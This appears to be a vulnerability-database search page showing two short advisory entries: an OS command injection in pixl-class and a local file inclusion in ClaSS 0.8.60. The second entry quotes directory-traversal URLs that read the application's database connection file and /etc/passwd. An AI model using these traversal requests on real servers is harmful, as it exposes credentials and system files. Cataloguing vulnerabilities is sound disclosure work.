2 matches found
OS Command Injection in pixl-class
pixl-class prior to 1.0.3 allows execution of arbitrary commands. The members argument of the create function can be controlled by users without any sanitization...
ClaSS 0.8.60 - export.php Local File Inclusion
ClaSS 0.8.60 - export.php Local File Inclusion ClaSS http://www.laex.org/class/ - =0.8.60 - magicquotesgpc = Off registerglobals = On - File Disclosure/Download - http://site/Class/class/scripts/export.php?ftype= /../../path/to/Class/school.php /../../path/to/Class/dbhconnect.php /../../etc/passw...